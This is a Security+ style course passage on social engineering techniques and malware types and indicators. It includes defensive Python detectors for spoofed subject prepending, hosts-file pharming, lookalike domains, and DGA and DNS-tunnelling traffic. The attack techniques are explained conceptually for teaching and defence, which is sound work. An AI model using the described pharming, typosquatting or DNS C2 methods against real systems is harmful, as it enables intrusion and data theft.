A phishing or hoax email can be made more convincing by prepending. In an offensive sense, prepending means adding text that appears to have been generated by the mail system. For example, an attacker may add "RE:" to the subject line to make it appear as though the message is a reply, or may add something like "MAILSAFE: PASSED" to make it appear as though a message has been scanned and accepted by some security software. Conversely, some mail systems may perform prepending legitimately, such as tagging external messages or messages with a warning if they have not been definitively identified as spam but that do have suspicious elements.
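As an added example (not from the CompTIA guide), the following Python check flags the two spoofed-prepending tricks described above, a fake reply prefix and a fake scanner verdict, by comparing the Subject line against the message's own headers. The gateway tag, the X-Gateway-Tagged header and the sample messages are assumptions constructed for the example.

```python
"""Flag subject-line prepending that our mail gateway did not add.

Added example, not from the CompTIA guide. Assumes a hypothetical gateway
that prepends "[EXTERNAL]" to the Subject and records that it did so in an
X-Gateway-Tagged header; scanner verdicts never legitimately appear in the
sender-controlled Subject line.
"""
import email

GATEWAY_TAG = "[EXTERNAL]"           # hypothetical tag our gateway prepends
GATEWAY_HEADER = "X-Gateway-Tagged"  # hypothetical header set when it does
# Scanner-style phrases a sender might fake in the Subject line.
FAKE_VERDICTS = ("MAILSAFE: PASSED", "VIRUS FREE", "SCANNED")


def prepending_findings(raw_message: str) -> list[str]:
    """Return the suspicious-prepending findings for one RFC 5322 message."""
    msg = email.message_from_string(raw_message)
    subject = (msg.get("Subject") or "").strip()
    upper = subject.upper()
    findings = []
    # A real reply or forward carries threading headers; a bare "RE:" does not.
    if upper.startswith(("RE:", "FW:", "FWD:")) and not (
        msg.get("In-Reply-To") or msg.get("References")
    ):
        findings.append("reply/forward prefix without In-Reply-To/References")
    # Our own external tag should only be present when the gateway added it.
    if GATEWAY_TAG in subject and msg.get(GATEWAY_HEADER) is None:
        findings.append("gateway tag in Subject but gateway header missing")
    # Scanner verdicts belong in headers, never in the Subject the sender wrote.
    for phrase in FAKE_VERDICTS:
        if phrase in upper:
            findings.append(f"scanner-style text in Subject: {phrase}")
            break
    return findings


# Constructed sample messages (not real mail).
SPOOFED = """\
From: billing@partner.example.test
To: user@example.test
Subject: RE: [EXTERNAL] MAILSAFE: PASSED Invoice 1042 overdue

Please open the attached invoice today.
"""

GENUINE_REPLY = """\
From: contact@partner.example.test
To: user@example.test
In-Reply-To: <20240101.1@example.test>
X-Gateway-Tagged: yes
Subject: RE: [EXTERNAL] Meeting notes

Thanks, received.
"""

if __name__ == "__main__":
    for name, raw in (("spoofed", SPOOFED), ("genuine", GENUINE_REPLY)):
        print(name, prepending_findings(raw) or "no findings")
```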

Pharming and Credential Harvesting
Direct messages to a single contact have quite a high chance of failure. Other social engineering techniques still use spoofed resources, such as fake sites and login pages, but rely on redirection or passive methods to entrap victims.
Teaching Tip: Make sure students can distinguish phishing and pharming.
Pharming
Pharming is a passive means of redirecting users from a legitimate website to a malicious one. Rather than using social engineering techniques to trick the user, pharming relies on corrupting the way the victim's computer performs Internet name resolution, so that they are redirected from the genuine site to the malicious one. For example, if mybank.foo should point to one IP address, a pharming attack would corrupt the name resolution process to make it point to a different IP address.
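One local place where name resolution can be corrupted is the hosts file, which most systems consult before DNS. The following Python check, an added example that is not from the CompTIA guide, parses hosts-file text and flags any monitored domain mapped to an address outside a trusted inventory; the domains, addresses and sample text are constructed for the example.

```python
"""Detect local name-resolution tampering (pharming via the hosts file).

Added example, not from the CompTIA guide. The hosts file is consulted
before DNS on most systems, so whoever can write to it can send a known
domain to a different address without touching any DNS server. The
domains, expected addresses and sample hosts text are constructed here.
"""
import ipaddress

# Constructed inventory: monitored domains and the addresses they should
# resolve to (in practice, populated from a trusted source of truth).
EXPECTED = {
    "mybank.foo": {"192.0.2.10", "192.0.2.11"},
    "mail.example.test": {"198.51.100.5"},
}


def parse_hosts(text: str) -> list[tuple[str, str]]:
    """Return (address, hostname) pairs from hosts-file text, skipping
    comments, blank lines and lines whose first field is not an IP address."""
    pairs = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        fields = line.split()
        try:
            ipaddress.ip_address(fields[0])
        except ValueError:
            continue
        for name in fields[1:]:
            pairs.append((fields[0], name.lower().rstrip(".")))
    return pairs


def pharming_findings(hosts_text: str) -> list[str]:
    """Flag monitored domains that the hosts file maps to an unexpected address."""
    findings = []
    for addr, name in parse_hosts(hosts_text):
        if name in EXPECTED and addr not in EXPECTED[name]:
            findings.append(
                f"{name} overridden to {addr} (expected {sorted(EXPECTED[name])})"
            )
    return findings


# Constructed sample hosts text (not taken from a real machine).
SAMPLE_HOSTS = """\
127.0.0.1       localhost
::1             localhost
# a comment line is ignored
203.0.113.66    mybank.foo www.mybank.foo
198.51.100.5    mail.example.test
not an entry
"""

if __name__ == "__main__":
    for finding in pharming_findings(SAMPLE_HOSTS) or ["no findings"]:
        print(finding)
```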

Typosquatting
Rather than redirection, a threat actor might use typosquatting. This means that the threat actor registers a domain name that is very similar to a real one, such as connptia.org, hoping that users will not notice the difference. These are also referred to as cousin, lookalike, or doppelganger domains. Typosquatting might be used for pharming and phishing attacks. Another technique is to register a hijacked subdomain using the primary domain of a trusted cloud provider, such as onmicrosoft.com. If a phishing message appears to come from comptia.onmicrosoft.com, many users will be inclined to trust it.
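As an added example (not from the CompTIA guide), this Python classifier flags sender domains that are lookalikes of a protected domain (connptia.org for comptia.org) or that borrow a trusted cloud provider's primary domain (comptia.onmicrosoft.com), as described above; it generalizes to dropped-character and transposition typosquats as well. The protected domain, the provider list and the confusable-character table are assumptions.

```python
"""Classify a sender domain relative to a protected domain.

Added example, not from the CompTIA guide. It covers cousin/lookalike
registrations such as connptia.org and tenant subdomains such as
comptia.onmicrosoft.com that borrow a trusted cloud provider's primary
domain. PROTECTED, CLOUD_PRIMARY and CONFUSABLES are assumptions.
"""

PROTECTED = "comptia.org"
# Cloud providers that hand customers a subdomain of the provider's own domain.
CLOUD_PRIMARY = ("onmicrosoft.com",)
# Character groups that read alike at a glance; each key is replaced by each value.
CONFUSABLES = {
    "m": ("rn", "nn"),
    "rn": ("m",),
    "l": ("1", "i"),
    "o": ("0",),
    "w": ("vv",),
}


def lookalike_variants(label: str) -> set[str]:
    """Spellings of label that differ by one confusable swap, one dropped
    character or one adjacent transposition (common typosquat patterns)."""
    out = set()
    for src, repls in CONFUSABLES.items():
        start = label.find(src)
        while start != -1:
            for repl in repls:
                out.add(label[:start] + repl + label[start + len(src):])
            start = label.find(src, start + 1)
    for i in range(len(label)):
        out.add(label[:i] + label[i + 1:])  # one character dropped
        if i + 1 < len(label):              # two adjacent characters swapped
            out.add(label[:i] + label[i + 1] + label[i] + label[i + 2:])
    out.discard(label)
    return out


def classify_domain(domain: str) -> str:
    """Return 'legitimate', 'cloud-tenant lookalike', 'lookalike',
    'tld-swap lookalike' or 'unrelated' for a sender domain."""
    domain = domain.lower().rstrip(".")
    if domain == PROTECTED or domain.endswith("." + PROTECTED):
        return "legitimate"
    base, _, tld = PROTECTED.partition(".")
    # A tenant name containing our brand under a provider's primary domain.
    for cloud in CLOUD_PRIMARY:
        if domain.endswith("." + cloud):
            tenant = domain[: -len(cloud) - 1]
            if base in tenant:
                return "cloud-tenant lookalike"
    sender_base, _, sender_tld = domain.partition(".")
    if sender_base in lookalike_variants(base):
        return "lookalike"
    if sender_base == base and sender_tld != tld:
        return "tld-swap lookalike"
    return "unrelated"


if __name__ == "__main__":
    # Constructed sender domains for a quick demonstration.
    for d in ("comptia.org", "connptia.org", "comptia.onmicrosoft.com",
              "comptia.com", "example.org"):
        print(f"{d:28} {classify_domain(d)}")
```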
Watering Hole Attack
A watering hole attack is another passive technique where the threat actor does not have to risk communicating directly with the target. It relies on the circumstance that a group of targets may use an unsecure third-party website. For example, staff running an international e-commerce site might use a local pizza delivery firm. If an attacker can compromise the pizza delivery firm's website or deploy a type of malvertising, they may be able to infect the computers of the e-commerce company's employees and penetrate the e-commerce company systems.


Credential Harvesting
Within the general realm of phishing and pharming, credential harvesting is a campaign specifically designed to steal account credentials. The attacker may have more interest in selling the database of captured logins than trying to exploit them directly. Such attacks will use an alarming message such as "Your account is being used to host child pornography" or "There is a problem with your account storage" and a link to a pharming site embroidered with the logos of a legitimate service provider, such as Google, Microsoft, Facebook, or Twitter. Attacks using malvertising or scripts injected into shopping cart code are also popular (csoonline.com article what-is-magecart-how-this-hacker-group-steals-payment-card-data.html). Targeted credential harvesting might be directed against a single company's password reset or account management portal.

Influence Campaigns
An influence campaign is a major program launched by an adversary with a high level of capability, such as a nation-state actor, terrorist group, or hacktivist group. The goal of an influence campaign is to shift public opinion on some topic. Most high-profile influence campaigns that have been detected target election activity, but actors may use such campaigns to pursue a number of goals. With state actors, the concept of soft power refers to using diplomatic and cultural assets to achieve an objective. When deployed along with espionage, disinformation/fake news, and hacking, a hostile campaign can be characterized as hybrid warfare (assets.publishing.service.gov.uk government uploads system uploads attachment data file MCDC C Information note Conceptual Foundations.pdf).
Diplomatic activity and election meddling by foreign security services has a very long history and well-established tactics. Modern campaigns can use social media to ensure wide distribution of hoaxes and invented stories. Actors can use AI-assisted bots and armies of people to open or hack accounts and repeat or reinforce messages that support the campaign's aims.
Apart from destabilizing the host country generally, influence campaigns might affect private companies because they become caught up within a fake story. It is important for companies to closely monitor references to them on social media and take steps to correct or remove false or misleading posts. When an influence campaign is detected, companies operating in critical industries (utilities, election management, transportation) should enter a heightened state of alert.
Teaching Tip: The Twitter hack to persuade people to buy fake cryptocurrency via injected tweets from high-profile individuals is one example of a non-political influence campaign, albeit a short-lived one (theverge.com elon-musk-bill-gates-twitter-hack-bitcoin-scam-compromised).


Review Activity:
Social Engineering Techniques
Answer the following questions:

1. The help desk takes a call and the caller states that she cannot connect to the e-commerce website to check her order status. She would also like a user name and password. The user gives a valid customer company name but is not listed as a contact in the customer database. The user does not know the correct company code or customer ID. Is this likely to be a social engineering attempt, or is it a false alarm?

This is likely to be a social engineering attempt. The help desk should not give out any information or add an account without confirming the caller's identity.

2. A purchasing manager is browsing a list of products on a vendor's website when a window opens claiming that anti-malware software has detected several thousand files on his computer that are infected with viruses. Instructions in the official-looking window indicate the user should click a link to install software that will remove these infections. What type of social engineering attempt is this, or is it a false alarm?

This is a social engineering attempt utilizing a watering hole attack and/or malvertising.

3. Your CEO calls to request market research data immediately be forwarded to her personal email address. You recognize her voice, but a proper request form has not been filled out and use of third-party email is prohibited. She states that normally she would fill out the form and should not be an exception, but she urgently needs the data to prepare for a round table at a conference she is attending. What type of social engineering techniques could this use, or is it a false alarm?

If social engineering, this is spear phishing (the attack uses specific detail) over a voice channel (vishing). It is possible that it uses deep fake technology for voice mimicry. The use of a sophisticated attack for a relatively low value data asset seems unlikely, however. A fairly safe approach would be to contact the CEO back on a known mobile number.

4. Your company manages marketing data and private information for many high-profile clients. You are hosting an open day for prospective employees. With the possibility of social engineering attacks in mind, what precautions should employees take when the guests are being shown around the office?

Employees should specifically be wary of shoulder surfing attempts to observe passwords and the like.


Topic 4B
Analyze Indicators of Malware-Based Attacks

EXAM OBJECTIVES COVERED
1.2 Given a scenario, analyze potential indicators to determine the type of attack
4.1 Given a scenario, use the appropriate tool to assess organizational security (Cuckoo only)

One of the most prevalent threats to computers today is malicious code. As a security professional, you will likely have experience in dealing with unwanted software infecting your systems. By classifying the various types of malware and identifying the signs of infection, you will be better prepared to remediate compromised systems or prevent malware from executing in the first place.

Teaching Tip: Basic malware types are covered in exams from ITF+ up, but ensure students can distinguish all the types listed here. Try to focus on detection of indicators. Other parts of objective 1.2, such as cryptographic, password, and physical attacks, are covered elsewhere in the course.

Malware Classification
Many of the intrusion attempts perpetrated against computer networks depend on the use of malicious software, or malware. Malware is usually simply defined as software that does something bad, from the perspective of the system owner. There are many types of malware, but they are not classified in a rigorous way, so some definitions overlap or are blurred. Some malware classifications, such as Trojan, virus, and worm, focus on the vector used by the malware. The vector is the method by which the malware executes on a computer and potentially spreads to other network hosts. Another complicating factor with malware classification is the degree to which its installation is expected or tolerated by the user. The following categories describe some types of malware according to vector:
• Viruses and worms: these represent some of the first types of malware and spread without any authorization from the user by being concealed within the executable code of another process.
• Trojan: malware concealed within an installer package for software that appears to be legitimate. This type of malware does not seek any type of consent for installation and is actively designed to operate secretly.
• Potentially unwanted programs (PUPs)/potentially unwanted applications (PUAs): software installed alongside a package selected by the user or perhaps bundled with a new computer system. Unlike a Trojan, the presence of a PUP is not automatically regarded as malicious. It may have been installed without active consent or consent from a purposefully confusing license agreement. This type of software is sometimes described as grayware rather than malware.
Other classifications are based on the payload delivered by the malware. The payload is an action performed by the malware other than simply replicating or persisting on a host. Examples of payload classifications include spyware, rootkit, remote access Trojan (RAT), and ransomware.
Teaching Tip: Try to distinguish methods that classify malware by the vector from those that describe the payload or goal of the malware.


Malware classification by vector.

Computer Viruses
A computer virus is a type of malware designed to replicate and spread from computer to computer, usually by infecting executable applications or program code. There are several different types of viruses and they are generally classified by the different types of file or media that they infect:
• Non-resident/file infector: the virus is contained within a host executable file and runs with the host process. The virus will try to infect other process images on persistent storage and perform other payload actions. It then passes control back to the host program.
• Memory resident: when the host file is executed, the virus creates a new process for itself in memory. The malicious process remains in memory, even if the host process is terminated.
• Boot: the virus code is written to the disk boot sector or the partition table of a fixed disk or media, and executes as a memory resident process when the OS starts or the media is attached to the computer.
• Script and macro viruses: the malware uses the programming features available in local scripting engines for the OS and/or browser, such as PowerShell, Windows Management Instrumentation (WMI), JavaScript, Microsoft Office documents with Visual Basic for Applications (VBA) code enabled, or PDF documents with JavaScript enabled.
In addition, the term multipartite is used for viruses that use multiple vectors and polymorphic for viruses that can dynamically change or obfuscate their code to evade detection.
What these types of viruses have in common is that they must infect a host file or media. An infected file can be distributed through any normal means: on a disk, on a network, as an attachment to an email or social media post, or as a download from a website.


Unsafe attachment detected by Outlook's mail filter. The double file extension is an unsophisticated attempt to fool any user not already alerted by the use of both English and German in the message text. (Screenshot used with permission from Microsoft.)

Computer Worms and Fileless Malware
A computer worm is memory-resident malware that can run without user intervention and replicate over network resources. A virus is executed only when the user performs an action such as downloading and running an infected executable process, attaching an infected USB stick, or opening an infected Word document with macros enabled. By contrast, a worm can execute by exploiting a vulnerability in a process when the user browses a website, runs a vulnerable server application, or is connected to an infected file share. For example, the Code Red worm was able to infect early versions of Microsoft's IIS web server software via a buffer overflow vulnerability. It then scanned randomly generated IP ranges to try to infect other vulnerable IIS servers (caida.org/research/security/code-red).
Teaching Tip: Where a virus requires a file or media to replicate, worms and fileless malware can replicate between processes in memory on the local host and over network shares. Fileless is tricky to define exactly, but it illustrates the wide range of vectors that threat actors can exploit.
The primary effect of the first types of computer worm is to rapidly consume network bandwidth as the worm replicates. A worm may also be able to crash an operating system or server application (performing a Denial of Service attack). Also, like viruses, worms can carry a payload that may perform some other malicious action.
The Conficker worm illustrated the potential for remote code execution and memory-resident malware to effect highly potent attacks (secureworks.com/research/downadup-removal). As malware has continued to be developed for criminal intent and security software became better able to detect and block static threats, malware code and techniques have become more sophisticated. The term fileless has gained prominence to refer to these modern types of malware. Fileless is not a definitive classification, but it describes a collection of common behaviors and techniques:
• Fileless malware does not write its code to disk. The malware uses memory-resident techniques to run in its own process, within a host process or dynamic link library (DLL), or within a scripting host. This does not mean that there is no disk activity at all, however. The malware may change registry values to achieve persistence (executing if the host computer is restarted). The initial execution of the malware may also depend on the user running a downloaded script, file attachment, or Trojan software package.

• Fileless malware uses lightweight shellcode to achieve a backdoor mechanism on the host. The shellcode is easy to recompile in an obfuscated form to evade detection by scanners. It is then able to download additional packages or payloads to achieve the actor's actions on objectives. These packages can also be obfuscated, streamed, and compiled on the fly to evade automated detection.
• Fileless malware may use "live off the land" techniques rather than compiled executables to evade detection. This means that the malware code uses legitimate system scripting tools, notably PowerShell and Windows Management Instrumentation (WMI), to execute payload actions. If they can be executed with sufficient permissions, these environments provide all the tools the attacker needs to perform scanning, reconfigure settings, and exfiltrate data.

The terms advanced persistent threat (APT) and advanced volatile threat (AVT) can be used to describe this general class of modern fileless/"live off the land" malware. Another useful classification is low-observable characteristics (LOC) attack (mcafee.com/enterprise/en-us/security-awareness/ransomware/what-is-fileless-malware.html). The exact classification is less important than the realization that adversaries can use any variety of coding tricks to effect intrusions and that their tactics, techniques, and procedures to evade detection are continually evolving.

Spyware and Keyloggers
The first viruses and worms focused on the destructive potential of being able to replicate. As the profitable uses of this software became apparent, however, they started to be coded with payloads designed to facilitate intrusion, fraud, and data theft. Various types of unwanted code and malware perform some level of monitoring:
• Tracking cookies: cookies are plain text files, not malware, but if browser settings allow third-party cookies, they can be used to record pages visited, search queries, browser metadata, and IP address. Tracking cookies are created by adverts and analytics widgets embedded into many websites.
• Adware: this is a class of grayware that performs browser reconfigurations, such as allowing tracking cookies, changing default search providers, opening sponsor's pages at startup, adding bookmarks, and so on. Adware may be installed as a program or as a browser extension/plug-in.
• Spyware: this is malware that can perform adware-like tracking, but also monitor local application activity, take screenshots, and activate recording devices, such as a microphone or webcam. Another spyware technique is to perform DNS redirection to pharming sites.
• A keylogger is spyware that actively attempts to steal confidential information by recording keystrokes. The attacker will usually hope to discover passwords or credit card data.
Teaching Tip: Spyware/keylogger is a means of classifying malware by its purpose, rather than vector.


Actual Keylogger is Windows software that can run in the background to monitor different kinds of computer activity (opening and closing programs, browsing websites, recording keystrokes, and capturing screenshots). (Screenshot used with permission from ActualKeylogger.com.)

Keyloggers are not only implemented as software. A malicious script can transmit key presses to a third-party website. There are also hardware devices to capture key presses to a modified USB adapter inserted between the keyboard and the port. Such devices can store data locally or come with Wi-Fi connectivity to send data to a covert access point. Other attacks include wireless sniffers to record key press data, overlay ATM pin pads, and so on.

Backdoors and Remote Access Trojans
Any type of access method to a host that circumvents the usual authentication method and gives the remote user administrative control can be referred to as a backdoor. A remote access trojan (RAT) is backdoor malware that mimics the functionality of legitimate remote control programs, but is designed specifically to operate covertly. Once the RAT is installed, it allows the threat actor to access the host, upload files, and install software or use "live off the land" techniques to effect further compromises.

In this context, RAT can also stand for Remote Administration Tool. A host that is under malicious control is sometimes described as a zombie.

A compromised host can be installed with one or more bots. A bot is an automated script or tool that performs some malicious activity. A group of bots that are all under the control of the same malware instance can be manipulated as a botnet by the herder program. A botnet can be used for many types of malicious purpose, including triggering distributed denial of service (DDoS) attacks, launching spam campaigns, or performing cryptomining.


SubSeven RAT. (Screenshot used with permission from Wikimedia Commons, CC BY-SA 4.0 International.)

Whether a backdoor is used as a standalone intrusion mechanism or to manage bots, the threat actor must establish a connection from the compromised host to a command and control (C2 or C&C) host or network. This network connection is usually the best way to identify the presence of a RAT, backdoor, or bot. There are many means of implementing a C&C network as a covert channel to evade detection and filtering. Historically, the Internet Relay Chat (IRC) protocol was popular. Modern methods are more likely to use command sequences embedded in HTTP or DNS traffic.

Backdoors can be created in other ways than infection by malware. Programmers may create backdoors in software applications for testing and development that are subsequently not removed when the application is deployed. Backdoors are also created by misconfiguration of software or hardware that allows access to unauthorized users. Examples include leaving a router configured with the default administrative password, having a Remote Desktop connection configured with an unsecure password, or leaving a modem open to receive dial-up connections.

Rootkits

In Windows, malware can only be manually installed system-wide with local administrator privileges. This means the user must be confident enough in the installer package to enter the credentials or accept the User Account Control (UAC) prompt. Windows tries to protect the system from abuse of administrator privileges. Critical processes run with a higher level of privilege (SYSTEM). Consequently, Trojans installed in the same way as regular software cannot conceal their presence entirely and will show up as a running process or service. Often the process image name is configured to be similar to a genuine executable or library to avoid detection. For example, a Trojan may use the filename "rundl32" to masquerade as "rundll32". To ensure persistence (running when the computer is restarted), the Trojan may have to use a registry entry or create itself as a service, which can usually be detected fairly easily.

If the malware can be delivered as the payload for an exploit of a severe vulnerability, it may be able to execute without requiring any authorization, using SYSTEM privileges. Alternatively, the malware may be able to use an exploit to escalate privileges after installation. Malware running with this level of privilege is referred to as a rootkit. The term derives from UNIX/Linux, where any process running as root has unrestricted access to everything from the root of the file system down.

In theory, there is nothing about the system that a rootkit could not change. In practice, Windows uses other mechanisms to prevent misuse of kernel processes, such as code signing (microsoft.com/security/blog/hardening-the-system-and-maintaining-integrity-with-windows-defender-system-guard). Consequently, what a rootkit can do depends largely on adversary capability and level of effort. When dealing with a rootkit, you should be aware that there is the possibility that it can compromise system files and programming interfaces, so that local shell processes, such as Explorer, taskmgr, or tasklist on Windows or ps or top on Linux, plus port scanning tools, such as netstat, no longer reveal its presence (at least, if run from the infected machine). The practical consequence is that a suspected rootkit should be investigated from outside the host: a packet capture taken on another device, or a disk image examined offline, does not pass through the interfaces the rootkit controls. A rootkit may also contain tools for cleaning system logs, further concealing its presence (microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Win32/Cutwail).

Software processes can run in one of several rings. Ring 0 is the most privileged (it provides direct access to hardware) and so should be reserved for kernel processes only. Ring 3 is where user-mode processes run; drivers and I/O processes may run in Ring 1 or Ring 2. This architecture can also be complicated by the use of virtualization.

There are also examples of rootkits that can reside in firmware (either the computer firmware or the firmware of any sort of adapter card, hard drive, removable drive, or peripheral device). These can survive any attempt to remove the rootkit by formatting the drive and reinstalling the OS. For example, intelligence agencies have developed the DarkMatter and QuarkMatter UEFI rootkits targeting the firmware on Apple MacBook laptops (pcworld.com/article/after-cia-leak-intel-security-releases-detection-tool-for-efi-rootkits.html).

Ransomware, Crypto-Malware, and Logic Bombs

Ransomware is a type of malware that tries to extort money from the victim. One class of ransomware will display threatening messages, such as requiring Windows to be reactivated or suggesting that the computer has been locked by the police because it was used to view child pornography or for terrorism. This may apparently block access to the file system by installing a different shell program, but this sort of attack is usually relatively simple to fix.

WannaCry ransomware. (Image by Wikimedia Commons.)

The crypto-malware class of ransomware attempts to encrypt data files on any fixed, removable, and network drives. If the attack is successful, the user will be unable to access the files without obtaining the private encryption key, which is held by the attacker. If successful, this sort of attack is extremely difficult to mitigate, unless the user has up-to-date backups of the encrypted files. Those backups only help if they are kept offline or otherwise out of reach of the malware, which will encrypt any mapped or writable backup location it can find. One example of this is CryptoLocker, a Trojan that searches for files to encrypt and then prompts the victim to pay a sum of money before a certain countdown time, after which the malware destroys the key that allows the decryption.

Ransomware uses payment methods, such as wire transfer, cryptocurrency, or premium rate phone lines, to allow the attacker to extort money without revealing his or her identity or being traced by local law enforcement.

Another type of crypto-malware hijacks the resources of the host to perform cryptocurrency mining. This is referred to as crypto-mining or crypto-jacking. The total number of coins within a cryptocurrency is limited by the difficulty of performing the calculations necessary to mint a new digital coin. Consequently, new coins can be very valuable, but it takes enormous computing resources to discover them. Crypto-jacking is often performed across botnets.

Some types of malware do not trigger automatically. Having infected a system, they wait for a pre-configured time or date (time bomb) or a system or user event (logic bomb). Logic bombs also need not be malware code. A typical example is a disgruntled system administrator who leaves a scripted trap that runs in the event his or her account is deleted or disabled. Anti-virus software is unlikely to detect this kind of malicious script or program. This type of trap is also referred to as a mine.


Malware Indicators

Given the range of malware types, there are many potential indicators. Some types of malware display obvious changes, such as adjusting browser settings or displaying ransom notices. If malware is designed to operate covertly, indicators can require detailed analysis of process, file system, and network behavior.

Teaching Tip: Make sure students know which tools to use to collect indicators of malware presence and type.

Anti-Virus Notifications

Most hosts should be running some type of anti-virus (A-V) software. While the A-V moniker remains popular, these suites are better conceived of as endpoint protection platforms (EPPs) or next-gen A-V. These detect malware by signature regardless of type, though detection rates can vary quite widely from product to product. Many suites also integrate with user and entity behavior analytics (UEBA) and use AI-backed analysis to detect threat actor behavior that has bypassed malware signature matching.

Sandbox Execution

If it is not detected by endpoint protection, you may want to analyze the suspect code in a sandboxed environment. A sandbox is a system configured to be completely isolated from its host so that the malware cannot break out. The sandbox will be designed to record file system and registry changes plus network activity. Cuckoo is packaged software that aims to provide a turnkey sandbox solution (cuckoosandbox.org). Be aware that malware which checks for virtualization or analysis artifacts may stay dormant or behave benignly inside a sandbox, so a clean sandbox report is not proof that a sample is harmless.

Resource Consumption

Abnormal resource consumption can be detected using a performance monitor, Task Manager, or the top Linux utility. Indicators such as excessive and continuous CPU usage, memory leaks, disk read/write activity, and disk space usage can be signs of malware, but can also be caused by many other performance and system stability issues. Also, it is only really poorly written malware or malware that performs intensive operations (botnet DDoS, crypto-jacking, and crypto-ransomware, for instance) that displays this behavior. Resource consumption could be a reason to investigate a system rather than definitive proof of infection.

File System

While fileless malware is certainly prevalent, file system change or anomaly analysis is still necessary. Even if the malware code is not saved to disk, the malware is still likely to interact with the file system and registry, revealing its presence by behavior. A computer's file system stores a great deal of useful metadata about when files were created, accessed, or modified. Analyzing these metadata and checking for suspicious temporary files can help you establish your timeline of events for an incident that has left traces on a host and its files.

Process Analysis

Because shellcode is easy to obfuscate, it can often evade signature-based A-V products. Threat hunting and security monitoring must use behavioral-based techniques to identify infections. This means close analysis of the processes running in system memory on a host. To perform abnormal process behavior analysis effectively, you should build up a sense of what is normal in a system and spot deviations in a potentially infected system. You also need to use appropriate analysis tools. Sysinternals (docs.microsoft.com/en-us/sysinternals) is a suite of tools designed to assist with troubleshooting issues with Windows, and many of the tools are suited to investigating security issues. The Sysinternals tool Process Explorer is an enhanced version of Task Manager. You can view extra information about each process and better understand how processes are created in parent/child relationships.

In this example, the Metasploit Framework is being used to obtain access via a remotely executed PowerShell prompt, with privileges obtained by passing a captured hash. This attack leverages the Sysinternals PsExec utility to drop a service executable into the Admin$ share on the remote machine. In this variant of the attack, the service starts PowerShell. Pointing to the powershell.exe image in Process Explorer shows the parameters that the process launched with. In this case, the command used to start this is not typical of PowerShell usage. There is a long string of characters, which is binary code represented in Base64. The script is injecting this into a new DLL, stored in memory only.

Observing use of PsExec to invoke a PowerShell script that creates memory-resident shellcode. (Screenshot Process Explorer docs.microsoft.com/en-us/sysinternals.)

This sort of behavior can be observed in real time only when the malware is executed under observation, such as in a sandbox. On production hosts, threat hunting and automated detection tools instead rely on detailed logging, such as that provided by System Monitor (Sysmon; a widely used configuration is at github.com/SwiftOnSecurity/sysmon-config), which records process creation together with the full command line, parent process, and hashes, so that malicious process behavior can be identified after the fact.
Along with observing how a process interacts with the file system, network activity is one of the most reliable ways to identify malware. Threat data can be used to correlate connections to known bad IP addresses and domains, but malware may try to connect to continually shifting endpoints, utilizing techniques such as fast flux and domain generation algorithms (DGA). It may try to use social media and cloud services to blend in with legitimate traffic.
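Earlier in this topic the text notes that the C2 connection is usually the best way to spot a RAT or bot and that modern channels hide in DNS; the paragraph above adds that the endpoints shift through DGA. Together those give a detection that works even when threat feeds have no entry for the domain. The following added example (not the guide's own code, and not a product signature) scores constructed DNS resolver log lines per client: second-level labels that are long and high-entropy are reported as DGA candidates, TXT queries carrying a long leftmost label as possible DNS tunnelling, and the NXDOMAIN ratio per client as a supporting indicator. The log format and the thresholds are assumptions made for the example.

```python
import math
from collections import defaultdict
from typing import Dict

# Constructed DNS query log. The field layout (timestamp, client, qname,
# qtype, rcode) is an assumption; real resolver logs differ but carry the same data.
SAMPLE_DNS_LOG = """\
2021-08-30T10:00:01Z 10.1.2.15 www.example.com A NOERROR
2021-08-30T10:00:02Z 10.1.2.15 cdn.example.net A NOERROR
2021-08-30T10:00:03Z 10.1.2.15 xk3jq9vw2mzp7lrtb.com A NXDOMAIN
2021-08-30T10:00:03Z 10.1.2.15 qp8z1ncvl0wr5xyg4.net A NXDOMAIN
2021-08-30T10:00:04Z 10.1.2.15 m2v7kdq0xz9slf4wj.org A NXDOMAIN
2021-08-30T10:00:04Z 10.1.2.15 b6t1rpyx3qwn8vkz5.info A NXDOMAIN
2021-08-30T10:00:05Z 10.1.2.15 j9qzv4xw1np6lk0mt.com A NXDOMAIN
2021-08-30T10:00:06Z 10.1.2.15 mail.example.com MX NOERROR
2021-08-30T10:00:07Z 10.1.2.20 update.example.org A NOERROR
2021-08-30T10:00:08Z 10.1.2.15 4d41494c5f424f58.t.example.net TXT NOERROR
"""

# Thresholds are illustrative assumptions; tune them against your own baseline.
DGA_MIN_LABEL_LEN = 12
DGA_MIN_ENTROPY = 3.5
TUNNEL_MIN_LABEL_LEN = 16


def shannon_entropy(s: str) -> float:
    """Bits of entropy per character; algorithmically generated labels score high."""
    if not s:
        return 0.0
    total = len(s)
    return -sum((s.count(c) / total) * math.log2(s.count(c) / total) for c in set(s))


def second_level_label(qname: str) -> str:
    """The label a DGA would have generated. Naive: treats the last label as the
    public suffix, which ignores multi-part suffixes such as co.uk (assumption)."""
    labels = qname.lower().rstrip(".").split(".")
    return labels[-2] if len(labels) >= 2 else labels[0]


def looks_generated(qname: str) -> bool:
    label = second_level_label(qname)
    return len(label) >= DGA_MIN_LABEL_LEN and shannon_entropy(label) >= DGA_MIN_ENTROPY


def looks_like_tunnel(qname: str, qtype: str) -> bool:
    """TXT queries with a long leftmost label are the classic DNS C2 channel:
    the label carries data out, the TXT answer carries commands back."""
    return qtype.upper() == "TXT" and len(qname.split(".")[0]) >= TUNNEL_MIN_LABEL_LEN


def analyze_dns_log(text: str) -> Dict[str, dict]:
    """Group queries by client and report DGA candidates, tunnelling candidates and
    the NXDOMAIN ratio (DGA hosts burn through many unregistered names)."""
    per_client: Dict[str, dict] = defaultdict(
        lambda: {"queries": 0, "nxdomain": 0, "dga_candidates": [], "tunnel_candidates": []}
    )
    for line in text.splitlines():
        fields = line.split()
        if len(fields) != 5:
            continue  # blank or malformed line
        _timestamp, client, qname, qtype, rcode = fields
        entry = per_client[client]
        entry["queries"] += 1
        if rcode == "NXDOMAIN":
            entry["nxdomain"] += 1
        if looks_generated(qname):
            entry["dga_candidates"].append(qname)
        if looks_like_tunnel(qname, qtype):
            entry["tunnel_candidates"].append(qname)
    for entry in per_client.values():
        entry["nxdomain_ratio"] = entry["nxdomain"] / entry["queries"]
    return dict(per_client)


if __name__ == "__main__":
    for client, entry in analyze_dns_log(SAMPLE_DNS_LOG).items():
        print(client, f"nxdomain={entry['nxdomain_ratio']:.2f}",
              "dga:", entry["dga_candidates"], "tunnel:", entry["tunnel_candidates"])
```

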